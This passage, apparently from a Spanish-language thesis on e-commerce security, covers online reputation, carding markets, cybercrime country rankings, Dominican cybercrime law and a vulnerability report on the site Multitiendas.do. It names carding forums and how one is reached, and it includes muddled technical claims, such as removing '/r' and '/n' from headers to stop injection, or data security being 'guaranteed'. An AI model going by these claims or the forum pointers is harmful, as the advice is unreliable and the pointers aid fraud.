identificación, medición y valoración57.
6.5.1 - Reputación Online.
Según Javier Celaya, escritor del libro “La empresa en la web 2.0”: La
reputación online se está convirtiendo en una de las aéreas de mayor
preocupación para muchos directivos. Aunque la mayoría de las empresas
declara que la gestión de su reputación corporativa es una prioridad
estratégica, lo cierto es que muy pocas han desarrollado procesos internos y
externos para gestionar su reputación en la web social.
56
Wikipedia.org, Seguridad de la información, recuperado el 18 de julio del 2011 de
http://es.wikipedia.org/wiki/Seguridad_de_la_informaci%C3%B3n 57
Martín de Castro, Gregorio. Reputación empresarial y ventaja competitiva (2008).
147
Ya no basta con diseñar una excelente pagina web; cuanto más visible sea su
empresa, menos dominio tendrá sobre su imagen en la red. No hay duda de
que una web corporativa es clave para apoyar la imagen de una empresa en
Internet, pero su sitio web le aportara menos de un tercio de su reputación
digital.
Las conversaciones que tienen lugar en los blogs, wikis y redes sociales
aportan los otros dos tercios de la reputación corporativo online.
Con la ayuda de twitter, grandes cantidades de empresas se han sumergido al
mundo de twitter para crear un vínculo más directo con sus seguidores, dando
soportes, servicio al cliente y en ocasiones para promocionar eventos, marcas
o concursos. Las empresas más conocidas cuentan con cientos de miles de
seguidores alrededor de todo el mundo que con un simple post de un mensaje
puede comunicarse con todos sus seguidores, de cierta forma esto brinda
transparencia a la hora de comunicarse porque es directo y al instante.
Existen compañías que tienen personas encargadas especialmente el manejo
de su presencia en el mundo de las redes sociales.
6.5.2 - Aspectos negativos organizacionales.
Mientras más presencia y participación se tiene en las redes sociales, más
impactos pueden tener las estrategias de negocios. Para poder construir una
reputación corporativa en estos medios no es un trabajo fácil de realizar; para
148
muchas empresas la perdida de la reputación online es una de las amenazas
capaces de derrumbar una marca o producto.
Las redes sociales han sido en muchas ocasiones las responsables de echarle
tierra a la imagen de muchas corporaciones por sus comportamientos y mal
manejo. Cada comentario, foto o video plasmado puede traer comentarios
positivos o negativos.
Para construir y permanecer con buena reputación online es recomendable:
I. Comprometerse solamente con las cosas que pueden cumplir.
II. Optar por lograr la mayor satisfacción de sus potenciales clientes.
III. Buen manejo en la forma de expresarse al expresarse.
No cumplir con estos consejos colocaría su empresa en la bocas de muchos
que estarán difamando y empañando su presencian y reputación online.
Existen ocasiones en que la reputación empresarial cuelga de un hilo cuando
nuestra empresa ha sido víctima de un ataque por un agente amenazador o
hacker y este demuestre con pruebas el ataque realizado. La pérdida de datos
o caída del sitio web no brinda seguridad a sus clientes luego de ver sus datos
en manos de hackers y estos negociando sus correos, claves, cuentas
bancarias, tarjetas de crédito, entre otros.
Luego que PayPal fuera atacada por una joven llamada Renee Haefer, la cual
fue detenida días después y procesada a 15 años de prisión y una multa que
149
ronda entre los 500 mil dólares, el grupo de hacker Anonymous logró
convencer a mas de 20 mil usuarios para que cerraran sus cuenta con PayPal
(Ver Imagen 6.5.2.1). Esto muestra la fuerza de las masas en las redes
sociales.
Imagen 6.5.2.1: Noticia cuentas cerradas por influencia Anonymous (fuente:
http://mx.ibtimes.com/articles/15827/20110727/paypal-anonymous-antisec-
ebay-bolsa-nasdaq.htm)
6.6 – Negociación de información financiera.
Los crímenes cibernéticos obtienen información de tarjetas de credito, cuentas
bancarias y otras informaciones financieras sensitivas usando métodos como el
phishing, network instrution, Trojan horses y muchas veces robos físicos. A
150
menudo, quienes venden este tipo de informaciones no son los responsables
de su robo pero si le pagan o compensan a un tercero para realizar dichas
operaciones criminales.
6.6.1 - Comprando/Vendiendo información financiera.
La mayoría de las transacciones de información financiera robadas se llevan a
cabo a través de métodos que son extremadamente difíciles de monitorear. Sin
embargo, una serie de foros activos sobre carding en línea todavía existen,
aunque casi todos ellos tienen alguna forma de registro, que tienden a no
participar en detalle por parte de los nuevos solicitantes.
VeriSign iDefense Analysts han sido capaces de acceder a la mayoría
de foros los foros de carding mediante el simple registro de las cuentas.
Los sitios web que tratan con de tarjetas de crédito robado e
información financieras generalmente caen en una de las siguientes
categorías: foros dedicados al carding, los vendedores con su propio portal, y
los foros noncarding utilizado para las transacciones relacionadas con el
carding.
Entre los foros relacionados con carding se encuentra los siguientes:
Carder.su: Formalmente conocido como carder.info, carder.su es un
dominio en el cual se maneja el ruso y el ingles, fundado en el 2005. Es
muy famoso, actualmente cuenta con más de 51,000 miembros. Para
151
accesar a este foro es necesario contactarse con un miembro para el
redireccionamiento del dominio del foro, el cual varía cada 5 horas.
CardingWorld.cc: Foro donde se habla el Ruso y el Ingles, fundado en el
2005. Inclinado al fraude cibernético, actualmente cuenta con más de
26,000 miembros. Los miembros en este foro, compran, venden y
manejan servicios ilícitos relacionados con cuentas bancarias y tarjetas.
También manejan hologramas de tarjetas de crédito, base de datos de
con nombres para iniciar a Internet banking, cuentas de PayPal y más.
Uno de los veteranos en carding y monitoreado por VeriSign iDefense,
es Lord Cyric, a quien se le busca desde el 2003 por ser uno de los
propietario de las bases de datos con estos tipos de credenciales, el cual
hasta la fecha se mantiene divulgando nuevas informaciones58.
La información sobre tarjetas de crédito representa 32% del negocio del
mercado negro de datos, según la revista muy interesante en su edición
junio del 2011. La información sobre un tarjetahabiente puede costar
entre 0.6 y 30 dólares. Los detalles de una cuenta bancaria valen entre
10 y 10,000 dólares.
Uno de los casos más recientes y graves de robo de información
personal ocurrió apenas a mediados de abril de este año cuando un
hacker logró obtener ilegalmente datos, incluyendo números de tarjetas
de crédito de 77 millones de usuarios de la red de juegos en línea de la
consola PlayStation.59
58
Howard, Rick, Cyber Fraud: Tactics, Techniques and Procedures, (2009). 59
Revista Muy Interesante, edición junio 2011, página 68, año XXVIII No.06*.
152
CAPÍTULO VII: CRIMEN ELECTRÓNICO
153
CAPÍTULO VII: CRIMEN ELECTRÓNICO
El delito informático, o crimen electrónico, se conoce como aquellas
operaciones ilícitas realizadas por medio de Internet o que tienen como objetivo
destruir y dañar ordenadores, medios electrónicos y redes de Internet. Sin
embargo, las categorías que definen un delito informático son aún mayores y
complejas y pueden incluir delitos tradicionales como el fraude,
el robo, chantaje, falsificación y la malversación de caudales públicos en los
cuales ordenadores y redes han sido utilizados. Con el desarrollo de la
programación y de Internet, los delitos informáticos se han vuelto más
frecuentes y sofisticados.
Existen actividades delictivas que se realizan por medio de estructuras
electrónicas que van ligadas a un sin número de herramientas delictivas que
buscan infringir y dañar todo lo que encuentren en el ámbito informático:
ingreso ilegal a sistemas, interceptado ilegal de redes, interferencias, daños en
la información (borrado, dañado, alteración o supresión de data crédito), mal
uso de artefactos, chantajes, fraude electrónico, ataques a sistemas, robo de
bancos, ataques realizados por hackers, violación de los derechos de
autor, pornografía infantil, pedofilia en Internet, violación de información
confidencial y muchos otros60.
60 Wikipedia.org, Delito Informático, Recuperado el 21 de Julio del 2011 de
http://es.wikipedia.org/wiki/Delito_inform%C3%A1tico.
154
7.1 - Crímenes organizados
No es de sorprenderse que detrás de estos crímenes que vienen originándose
desde hace años, ya se haya logrado crear fortunas. Sólo con fraudes en los
pagos con tarjetas de crédito el crimen organizado ha lucrado más de mil 500
millones de euros (2 mil 222 millones de dólares) el año pasado.
Al menos la mitad de los fraudes con tarjetas europeas clonadas fueron
cometidos fuera de la UE, donde los comerciantes todavía utilizan lectores de
las bandas magnéticas de las tarjetas en lugar de los chips adoptados por la
mayoría de países europeos61.
En el 2007 Symantec clasificó 20 países que se enfrentaron a la mayoría de los
delitos cibernéticos. En la elaboración de dicha lista, Symantec ha podido
cuantificar el código de software que interfiere con las funciones normales de
un ordenador, los sistemas de clasificación de zombis, y observe el Rango de
Phishing en sitios con alojamientos, que están diseñados para engañar a los
usuarios para que revelen información personal o de su cuenta bancaria.
Symantec también fue capaz de obtener datos como el número de infectados
con sistemas controlado con bots por ciberdelincuentes, clasificación de los
países donde se iniciaron los ataques cibernéticos y el factor de la tasa de un
mayor de la delincuencia informática en los países que tienen más acceso a
conexiones de banda ancha. La tasa más alta de la delincuencia informática se
61 Llibroabiertoyspillman.blogspot.com, Internet caldo del cultivo del crime, recuperado el 22 de julio
del 2011 de http://libroabiertorudyspillman.blogspot.com/2011/05/Internet-caldo-de-cultivo-del-crimen.html
155
encontró que en los Estados Unidos, que sobre todo puede contribuir a la
amplia gama de conexiones de banda ancha disponibles, que son aquellos que
permiten la conexión a Internet sin interrupciones.
Cada país en las listas cuenta con seis factores que contribuyen parte de la
actividad del ordenador malicioso, rango de códigos maliciosos, el rango de
spam zombis, Rango de Phishing en sitios con alojamientos, el rango bot y el
origen de ataque. (ver imagen 7.1.1)
Imagen 7.1.1: Tasa países con mayor ciberdelincuencia
156
Lista de los 20 países con la tasa más alta de la ciberdelincuencia, según el
sitio web enigmasoftware.com:
1. Estados Unidos de América
Distribución de código malicioso:
23%
Rango de código malicioso: 1
Rango de spam zombis: 3
Rango de Phishing en sitios con
alojamientos: 1
Rango de bot: 2
Rango de origen del ataque : 1
2. China
Distribución de código malicioso:
9%
Rango de código malicioso: 2
Rango de spam zombis: 4
Rango de Phishing en sitios con
alojamientos: 6
Rango de bot: 1
Rango de origen del ataque : 2
3. Alemania
Distribución de código malicioso:
6%
Rango de código malicioso: 12
Rango de spam zombis: 2
Rango de Phishing en sitios con
alojamientos: 2
Rango de bot: 4
Rango de origen del ataque : 4
4. Gran Bretaña
Distribución de código malicioso:
5%
Rango de código malicioso: 4
Rango de spam zombis: 10
Rango de Phishing en sitios con
alojamientos: 5
Rango de bot: 9
Rango de origen del ataque : 3
157
5. Brasil
Distribución de código malicioso:
4%
Rango de código malicioso: 16
Rango de spam zombis: 1
Rango de Phishing en sitios con
alojamientos: 16
Rango de bot: 5
Rango de origen del ataque : 9
6. España
Distribución de código malicioso:
4%
Rango de código malicioso: 10
Rango de spam zombis: 8
Rango de Phishing en sitios con
alojamientos: 13
Rango de bot: 3
Rango de origen del ataque : 6
7. Italia
Distribución de código malicioso:
3%
Rango de código malicioso: 11
Rango de spam zombis: 6
Rango de Phishing en sitios con
alojamientos: 14
Rango de bot: 6
Rango de origen del ataque : 8
8. Francia
Distribución de código malicioso:
3%
Rango de código malicioso: 8
Rango de spam zombis: 14
Rango de Phishing en sitios con
alojamientos: 9
Rango de bot: 10
Rango de origen del ataque : 5
158
9. Turquía
Distribución de código malicioso:
3%
Rango de código malicioso: 15
Rango de spam zombis: 5
Rango de Phishing en sitios con
alojamientos: 24
Rango de bot: 8
Rango de origen del ataque : 12
10. Polonia
Distribución de código malicioso:
3%
Rango de código malicioso: 23
Zombis rango de spam: 9
Rango de Phishing en sitios con
alojamientos: 8
Rango de bot: 7
Rango de origen del ataque : 17
11. India
Distribución de código malicioso:
3%
Rango de código malicioso: 3
Rango de spam zombis: 11
Rango de Phishing en sitios con
alojamientos: 22
Rango de bot: 20
Rango de origen del ataque : 19
12. Rusia
Distribución de código malicioso:
2%
Rango de código malicioso: 18
Rango de spam zombis: 7
Rango de Phishing en sitios con
alojamientos: 7
Rango de bot: 17
Rango de origen del ataque : 14
13. Canadá
Distribución de código malicioso:
2%
Rango de código malicioso: 5
Rango de spam zombis: 40
Rango de Phishing en sitios con
alojamientos: 3
Rango de bot: 14
Rango de origen del ataque : 10
159
14. Corea del Sur
Distribución de código malicioso:
2%
Rango de código malicioso: 21
Rango de spam zombis: 19
Rango de Phishing en sitios con
alojamientos: 4
Rango de bot: 15
Rango de origen del ataque : 7
15. Taiwán
Distribución de código malicioso:
2%
Rango de código malicioso: 11
Rango de spam zombis: 21
Rango de Phishing en sitios con
alojamientos: 12
Rango de bot: 11
Rango de origen del ataque : 15
16. Japón
Distribución de código malicioso:
2%
Rango de código malicioso: 7
Rango de spam zombis: 29
Rango de Phishing en sitios con
alojamientos: 11
Rango de bot: 22
Rango de origen del ataque : 11
17. México
Distribución de código malicioso:
2%
Rango de código malicioso: 6
Rango de spam zombis: 18
Rango de Phishing en sitios con
alojamientos: 31
Rango de bot: 21
Rango de origen del ataque : 16
18. Argentina
Parte de la actividad del ordenador
malicioso: 1%
Rango de código malicioso: 44
160
Rango de spam zombis: 12 Rango de Phishing en sitios con
alojamientos: 20
Rango de bot: 12
Rango de origen del ataque : 18
19. Australia
Parte de la actividad del ordenador malicioso: 1%
Rango de código malicioso: 14
Rango de spam zombis: 37
Rango de Phishing en sitios con alojamientos: 17
Rango de bot: 27
Rango de origen del ataque : 13
20. Israel
Parte de la actividad del ordenador malicioso: 1%
Rango de código malicioso: 40
Rango de spam zombis: 16
Rango de Phishing en sitios con alojamientos: 15
Rango de bot: 16
Rango de origen del ataque : 22
62
62
Enigmasoftware, recuperado el 22 de Julio del 201 http://www.enigmasoftware.com/top-20-countries-the-most-cybercrime/
161
Los 10 principales países donde la Ciberdelincuencia tiene presencia según
amarjit.info. 2011 enero-mayo:
1. EE.UU.
2. Francia
3. Rusia
4. Alemania
5. China
6. Canadá
7. Países Bajos
8. Corea del Sur
9. Rumania
10. Reino Unido
"Cada vez más contenido malicioso se ha estado alojando en Canadá como nunca
antes", dijo Patrik Runald, Director Senior de Investigación sobre Seguridad de
Websense63.
63
Amarijit.info, Los 10 países que alojan sitio de cibercrimen, recuperado el 22 de julio del 2011 de:
http://www.amarjit.info/2011/05/top-10-countries-that-host-cyber-crime.html
162
Estamos en tiempos donde cada vez hay más actividades cibercriminales. Es
importante para los ciudadanos canadienses ser más precavidos en Internet, tomando
precauciones al hacer clic en los enlaces. "
Los 10 países que alojan sitios de Phishing, Enero-Mayo 2011
1. EE.UU.
2. Canadá
3. Egipto
4. Alemania
5. Reino Unido
Los delincuentes cibernéticos están trasladando sus centros de mando y control a sitios
más seguros. En los últimos ocho meses, Canadá experimentó un aumento del 53 por
ciento en las redes de bot. Canadá es el único país que mostró un aumento de las
redes bot en los últimos ocho meses, en comparación con los países antes
mencionados.
En 2010, Canadá fue el Numero 13 en el mundo por haber acogido el delito cibernético,
y en 2011 saltó al Numero 6.
Los delincuentes cibernéticos están en movimiento de nuevo y, esta vez, Canadá es el
principal objetivo. Direcciones IP en China y Europa del Este son muy analizadas y
sometidas a intensas evaluaciones así que los atacantes están en una búsqueda para
mover sus redes a los países que tienen mejor reputación cibernética, según
Websense.
163
7.2 - Publicación de data confidencial.
Como hemos mencionado anteriormente los cibercriminales, hackers o agentes
amenazadores utilizan los servicios de sitios webs para publicar la información robada,
ya sea gratis a todo el público o pagada.
Un aplicación web que ha ayudado mucho a las publicaciones de estas informaciones
es Pastebin, una aplicación web que permite a sus usuarios subir pequeños textos,
generalmente ejemplos de código, para que estén visibles al público en general a
través de su sitio web http://pastebin.com (ver Imagen 7.2.1).
Pastebin se vuelve práctico porque ofrece una manera sencilla y fácil para que el
usuario A coloque su código en línea para que lo vea cualquiera, posiblemente con
formato personalizado o con coloreado de sintaxis para hacerlo más fácil de leer.
Tampoco hay necesidad de que el usuario le envíe el código a cada usuario que desee
ayudarle; un único envío es suficiente para llegar a todos los ayudantes potenciales,
ahorrando tiempo y esfuerzo.
164
Imagen 7.2.1: Sitio web http://pastebin.com
Este portal es el preferido por el grupo hacktivista anonymous como medio para
publicar las noticias sobre sus ataques, informaciones de cuentas de correo, entre
otros.
165
7.3 - Prevención de Ciber-Crímenes
Como medio de prevención a los Cibercrímenes se pueden tomar en consideración los
siguientes consejos:
1. El usuario de la computadora debe tener algunos de los procedimientos de
prevención para evitar ser una víctima de la delincuencia cibernética en la
compra de productos en las tiendas. En primer lugar, debe investigar la
idoneidad del lugar donde se compra el producto. Muchos criminales crean sitios
web falsos para vender productos que, de hecho, nunca se entregan.
2. Existe un protocolo de seguridad para la comunicación entre el ordenador del
usuario y el servidor, el nombre del protocolo SSL (Secure Socket Layer) o TLS
(Transport Layer Security) y significa que los datos transmitidos son cifrados.
3. Los sitios que utilizan este protocolo de seguridad tiene una dirección en el
formato "https://www", a diferencia de la habitual "http://".
4. Cuando se accede a un sitio de comercio electrónico en la parte inferior del
navegador aparece un candado, por lo general su existencia significa que el sitio
es fiable y tiene un certificado de seguridad. Si el usuario hace clic en el
candado se puede comprobar el certificado digital del sitio.
166
5. En cualquier caso, evitar las compras con tarjeta de crédito a través de Internet,
es más seguro pagar por transferencia bancaria.
6. Monitorear en detalle su tarjeta de crédito y prestar especial atención a las
compras realizadas en línea. A menudo la víctima no hace la declaración de los
datos de las tarjetas y no tienen ningún conocimiento de las pérdidas.
7. Otro medio de prevención es tener cuidado con los correos electrónicos
recibidos de las tiendas de comercio electrónico que llegan diariamente sobre
ofertas que puede ser falso. Nunca ponga la información personal en formularios
generados a partir de los enlaces proporcionados en estos correos electrónicos.
8. No descargar o ejecutar archivos adjuntos a mensajes de correo electrónico, que
puede instalar archivos maliciosos en el equipo.
9. Dejar el bloqueador de spam habilitado y así automáticamente rechazar los
mensajes que se envían con origen dudoso.
10. La contraseña debe tener al menos ocho caracteres, con letras mayúsculas,
minúsculas y números, elegidos al azar.
167
11. No elija contraseñas que son fáciles de encontrar, como la fecha de nacimiento,
cumpleaños de la familia, los nombres de las personas cercanas, el equipo
favorito, los datos de direcciones, mascotas, etc.
12. Hay un modo de acción de los delincuentes cibernéticos llamada ingeniería
social que consiste en la víctima que proporcione información personal, sin
previo aviso que ofrecen subsidios a los que el atacante adivinar una contraseña
u otra información sensible.
13. Nunca utilice la misma contraseña para diferentes actividades. Tener diferentes
contraseñas para la banca, correos electrónicos y registro en los sitios de
comercio electrónico.
14. Mantenga sus contraseñas en secreto y no guardarlos en el ordenador. Cambiar
las contraseñas de forma constante.
15. No se olvide de cerrar la sesión (logout) después de llevar a cabo la compra o
haber iniciado sección al correo especialmente si se utiliza un ordenador
compartido por otros.
16. Instalar programa antivirus, preferiblemente que incluya corta fuegos (firewall) o
detección de intrusos, blockiador de spam y siempre mantenerlo actualizado.
168
7.4 - Leyes reguladoras
El miércoles 30 de Marzo de 2005 El Instituyo dominicano de las Telecomunicaciones
(Indotel) elaboró el anteproyecto de Ley sobre Crímenes y Delitos de Alta Tecnología el
cual entregó a Alfredo Pacheco. El msmo contempla drásticas sanciones contra la
pornografía infantil, la intercepción e intervención de señales o datos, la estafa, la
difamación, la injuria, el robo, la trata de personas y violaciones contra la propiedad
intelectual, cuando estos sean cometidos a través de sistemas electrónicos,
informáticos, telemáticos y de telecomunicaciones.
Este anteproyecto de Ley tipifica actos ilícitos vigentes en la legislación dominicana,
cuando sean cometidos a través de sistemas electrónicos, informáticos y de
telecomunicaciones. Entre esos delitos se citan además, el tráfico de humanos, la
venta de drogas y de sustancias controladas, entre otros y fue considerado por Alfredo
Pacheco, una propuesta sumamente importante.
Diversidad de delitos
La diversidad de los hechos delictivos de alta tecnología se consideran incluidos en
dicha propuesta los denominados delitos electrónicos, informáticos, cibernéticos,
telemáticos y de telecomunicaciones.
169
El doctor Vargas manifiesta que en la reunión con Pacheco, se le solicitó al presidente
de la Cámara Baja que se eliminará del proyecto de Código Penal los artículos que
tratan sobre los delitos electrónicos a los fines de que se deje a una legislación especial
por ser una materia tan especializada.
En la entrega del anteproyecto de ley participaron representantes del Indotel, de la
OPTIC y del sector privado que interviene en el negocio de las telecomunicaciones.
"Este anteproyecto es producto del trabajo consensuado de una comisión coordinada
desde agosto del año 2003 por el Indotel, la cual tuvo como misión elaborar un
anteproyecto de ley sobre delitos electrónicos, informáticos y de las
telecomunicaciones", expresó Vargas. Destacó que el anteproyecto de ley toma en
consideración para la regulación de esta materia, principios constitucionales y legales,
la situación nacional e internacional, y las disposiciones legales vigentes en la
República Dominicana.
El Ministerio Público
En cuanto al ámbito procesal, el doctor Vargas señala que se incorporan medidas para
"la conservación de la prueba y la integridad de la evidencia digital o electrónica
contenida en un sistema de información, otorgándole a las autoridades competentes
facultades que faciliten y agilicen el proceso investigativo".
170
El ministerio público, bajo las disposiciones del anteproyecto contra Crímenes y Delitos
de Alta Tecnología, contará con una dependencia especializada en la investigación y
persecución de los delitos y crímenes contenidos en el anteproyecto", subrayó.
Adicionalmente se creará la Comisión Interinstitucional contra Crímenes y Delitos de
Alta Tecnología (CICDAT), la cual estará integrada por representantes de la Policía
Nacional, la secretaría de las Fuerzas Armadas, la director de Control de Drogas
(DNCD), el Departamento Nacional de Investigaciones (DNI), la Procuraduría General
de la República, Indotel, la Superintendencia de Bancos, el Consejo Nacional de la
Niñez (CONANI) y el Instituto Tecnológico de las Américas (ITLA).
Entre las funciones de esta comisión, se encuentran la coordinación y cooperación con
autoridades policiales, militares, de investigación y judiciales, para mejorar y dar cabal
cumplimiento a las disposiciones de la presente ley.
El papel de la Policía Nacional (PN)
Además, establecer la coordinación y cooperación con gobiernos e institucionales
nacionales y extranjeras para prevenir y reducir la comisión de actos ilícitos de alta
tecnología en la República Dominicana y el resto del mundo, así como promover la
adopción y tratados internacionales en esta materia, debiendo velar por la implantación
y cumplimiento de los mismos.
171
Uno de los avances de este anteproyecto es crear el Departamento de Investigación de
Crímenes y Delitos de Alta Tecnología (DICAT), como entidad subordinada a la
Dirección Central de Investigaciones Criminales de la Policía Nacional, la cual sería
una dependencia especializada".
Los que trabajaron
La comisión que trabajó en la elaboración de esta propuesta legislativa la integraron
representantes de instituciones públicas, privadas y de la sociedad civil, como son la
Procuraduría General de la República, el DNI, las empresas de telecomunicaciones All
América Cable and Radio Inc., Centennial Dominicana, Orange Dominicana, Tricom,
Verizon Dominicana, la Fundación Institucionalidad y Justicia, entre otras.
Igualmente, trabajaron en este proyecto distinguidos profesionales del área, entre éstos
la ex diputada Ángela Jáquez, licenciado Jaime ángeles, licenciado Manuel Ramón
Vásquez Perrota y la firma de abogados Pellerano y Herrera.64
A raíz de este gran paso fue creado el Departamento de Investigación de Crímenes y
Delitos de Alta Tecnología (DICAT) de la dirección de Investigaciones Criminales de la
Policía Nacional es el departamento encargado de encarar los crímenes cibernéticos
en la Republica Dominicana65.
64 Indotel, Proyecto de ley sobre crímenes y delitos de alta tecnología, recuperado el 23 de julio del 2011 de
http://www.indotel.gob.do/noticias/noticias2005/indotel-elabora-anteproyecto-de-ley-sobre-crimenes-y-delitos-
de-alta-tecnologia.html
65 Tecnologicodominicano.blogspot.com, Que es el dicat?, recuperado el 23 de julio del 2011 de
http://tecnologicodominicano.blogspot.com/2010/07/que-es-el-dicat.html
172
Sus funciones son:
Investigar todas las denuncias de crímenes o delitos considerados de alta tecnología.
Responder con capacidad investigativa a todas las amenazas y ataques a la
infraestructura de tecnología critica nacional. Desarrollar inteligencia en Internet.
La ciudadanía que se vea afectada por delitos ante especificados, puede acudir a las
oficinas de DICAT ubicadas en el Palacio de la Policía Nacional, o llamar a los números
telefónicos 809-682-2151 ext. 2573, 2571, 2568, o vía e-mail
Algunos ejemplos de acciones en contra del ciber crimen en el país:
173
Fuente: http://www.imagenesdominicanas.com/2009/02/dicat-desmantela-centros-de-
tecno.html
174
Fuente: http://www.hoy.com.do/el-pais/2010/1/3/308427/print
175
Fuente: http://elnuevodiario.com.do/app/article.aspx?id=238279
176
CAPÍTULO VIII:
PROPUESTA SEGURIDAD
177
CAPÍTULO VIII: PROPUESTA SEGURIDAD
8.1 - Introducción
La empresa multitiendas.do, al igual que muchas empresas que se inician en el
negocio del comercio electrónico, desconocen que vender y ofrecer servicios por
Internet va más allá de realizar transacciones en línea. Existen muchas amenazas
tanto para las empresas que ejercen este tipo de negocio como para sus clientes.
Es importante conocer cuales riesgos se están corriendo y cuales consecuencias
podría traer para el futuro de la empresa si no se toman las medidas pertinentes para
mitigar dichos riesgos. Por esta razón es importante tomar los controles que permitan
prevenir que posibles ataques sean realizados a los sistemas utilizados por la empresa
y al usuario final.
8.2 - Matriz de Riesgo
Luego de examinado el portal Multitinedas.do se ha elaborado una matriz de riesgos,
basado en las vulnerabilidades de la misma, los controles a implementar y cuál es el
impacto organizacional que representan. Ver Matriz de Riesgo.(Anexo)
178
8.3 - Informe de Vulnerabilidades
Después de un minucioso análisis del portal electrónico Multitiendas.do, se han
encontrado numerosas vulnerabilidades en el sitio. Enumeradas de la siguiente
manera:
- Datos no encriptación: El portal carece de un certificado de seguridad (SSL). La
información enviada por los usuarios al portal pueden verse comprometidas si el
computador de este último está siendo monitoreada por algún agente amenazador
(hacker).
- Los comandos CR (Carriage Return) y LF (line feed) están permitidos: El código del
sitio no ha sido depurado adecuadamente y contiene códigos de inserción y comienzo
de línea, lo que permite a usuarios malintencionados utilizar varios ataques al servidor
web como MITM, división de respuesta (splitting HTTP hacking) y hasta ataques de
inyección SQL gracias la presencia de dichos comandos en el cabezal (header) del
sitio.
- No existen protocolos SSH: Para comunicarse con el servidor, no existe protocolos de
seguridad que encripten los datos que son enviados para tener acceso al mismo
(usuario y contraseña), al igual que los datos que se suben o bajan al servidor
(Archivos).
179
- Uso de código no seguro: Existen muchas discrepancias en la forma en la que está
codificada el sitio. Hay muchos errores de programación que pueden permitir a
usuarios malintencionados hacerse con el sitio y las informaciones sensibles de los
usuarios, utilizando ataques de inyección SQL y ataques XSS.
- Inapropiada configuración Servidor Web: Cuando se instala un servidor Web no se
debe de utilizar el mismo con las configuraciones que está usa por defecto. En el caso
de Multitiendas.do, el servidor web posee algunas configuraciones por defecto, lo que
puede comprometer la seguridad tanto del servidor como del sitio y todas las
informaciones que posee.
8.4 - Controles
Después de analizar las vulnerabilidades del sitio web Multitiendas.do, hemos
considerado que se deben de aplicar los siguientes controles preventivos y detectivos
para mitigar las amenazas que presenta el portal.
Controles:
- Se debe contactar al proveedor de alojamiento y adquirir un certificado de seguridad
SSL de 128bits como mínimo, para prevenir que las informaciones enviadas por lo
usuarios hacia el servidor no sean vistas por terceros.
180
- Se debe analizar el código de la pagina y eliminar del cabezal (header) los comandos
“/r” y “/n”, pues estos comprometen la seguridad del sitio, el servidor web y el usuario.
- Debido a que la conexión directa entre el cliente y el servidor no es segura, vía FTP,
es imprescindible de poseer mecanismos de encriptación para la información que va de
un lado a otro. Esto se logra con la adquisición de un protocolo de seguridad SSH, que
debe de facilitar el proveedor de alojamiento.
- En vista de que la codificación del sitio no ha sido la más apropiada, es recomendable
revisar por completo el código del sitio Multitiendas.do, depurarlo y ajustarlo a las
reglas y normas de la W3C. De esta manear se reducirán los riesgos de ataques tanto
al servidor web como al usuario.
- La empresa debe de contratar un administrador de base de datos, o los servicios de
un especialista en servidores web (apache) y realizar una configuración optima del
mismo. Para prevenir que usuarios mal intencionado penetren la base de datos y se
hagan con la misma.
8.5 - Informe Final
Después de haber estudiando a profundidad la situación del portal Multitiendas.do se
ha encontrado ciertas vulnerabilidades que pueden poner en peligro el sitio. Dichas
vulnerabilidades han sido descritas anteriormente y es de suma importancia para el
desarrollo del proyecto que sean mitigadas.
181
De no tomarse las medias de control antes señaladas, se podría poner en alto riesgo la
integridad de los datos, tanto estructural como las informaciones de los clientes. Todas
las vulnerabilidades del sitio pueden tener un alto impacto en la empresa, aunque
algunas de ellas tiene una mayor probabilidad de suceder que otras.
Salvo la adquisición de un protocolo de seguridad que garantice que la información,
que posee el servidor, se reciba y envíe de manera segura, todas las otras medias de
control preventivas y detectivas son fundamentales para garantizar la integridad del
sitio.
De no ser tomadas dichas medidas de control, el sitio Multitiendas.do puede verse
altamente amenazado por usuarios malintencionados que pueden hacerse con el sitio,
hacer un desfase (cambiar el aspecto), e incluso puede crear un copia del mismo y
hacerse con las credenciales de los usuarios (Phishing).
El costo de dichas implementaciones, no deberá tener un precio superior a los Mil
dólares (US$1,000), a excepción de la adquisición del especialista en servidores web
apache, cuyo precio podría variar según sus credenciales.
Dichas estimaciones, se hacen basados en los estándares internacionales de servicios
de hospedaje. Algunos de estos están sujetos a cambio partiendo del proveedor
elegido.
182
CONCLUSIÓN
183
CONCLUSIÓN
En el mundo de la informática, existen diversas formas de hacer las cosas, no importa
en que área se trabaje, siempre existen alternativas para hacer una misma función o
acción. En el desarrollo de páginas web, existe una mayor variad de forma para
desarrollarlas, cada programador tiene un estilo propio, y la calidad de la misma partirá
del conocimiento y la disciplina que tenga dicho desarrollador para crear el sitio.
Después de haber completado las investigaciones, podemos concluir que dado a que
no existen medidas de control definitivas para mitigar las amenazas que afectan los
portales electrónicos, es importante tener la mayor cantidad de controles posibles, para
de esta forma dificultar un posible ataque. Como el caso de Paypal.com, aunque el sitio
no es 100% seguro, el mismo posee tantos controles y tiene tan pocas fallas de
seguridad, que cuando fue atacado, el mismo no dejo de funcionar en ninguno
momento, aunque si trabajo lento por algunas horas. Los hackers que atacaron el sitio
admitieron no tener la fuerza suficiente para sacar el sitio de línea.
Al analizar la seguridad del sitio web Multitiendas.do, hemos encontrado diversas
vulnerabilidades en el mismo, lo que se traduce en pérdidas monetarias para la
empresa y una macha en la reputación de la misma, al no ser capaz de ofrecer a sus
usuarios la seguridad que estos necesitan para realizar tranquilamente compras en
línea. Es por esto que recomendados aplicar los controles para mitigar las amenazas
que posee el sitio.
184
Entendiendo que su estructura posee brechas que comprometen altamente el sitio se
coordinó con el programador del sitio para que tomara los controles pertinentes y
reducir el riesgo. Entre los controles recomendados están los siguientes:
- Instalar Certificados de seguridad (SSL / TSL): Dichos certificados garantizan la
seguridad de la información enviada al servidor web, mediante encriptación de lo
datos.
- Eliminar comandos “/r” y “/n” del Header: Al eliminar estas sentencias dentro del
header (cabezal) se evita que usuarios malintencionados inserten código dentro
de la pagina.
- Instalar Protocolos de seguridad SSH: Este protocolo de seguridad asegura que
los datos enviados por el usuario hacia el servidor, cuando realiza una conexión
remota, no se vista por terceros.
- Revisión del código: En vista de las discrepancias en la forma en que está
codificada la página, se ha re-escrito el sitio, aplicando las mejores técnicas
recomendadas por la W3C.
- Configurar apropiadamente el servidor web (apache): Se contrató un
administrador de base de datos que configuró apropiadamente el servidor web y
optimizó el mismo.
Con estas medidas tomadas se ha reducido altamente el riesgo de ser atacado por
usuarios malintencionados. Aunque el sitio puede ser víctima de un ataque DDOS, la
seguridad de los dato está garantizada. Y la estabilidad del portal está segura en un
95%.
185
Las medidas descritas anteriormente demuestran que si se puede asegurar un sitio en
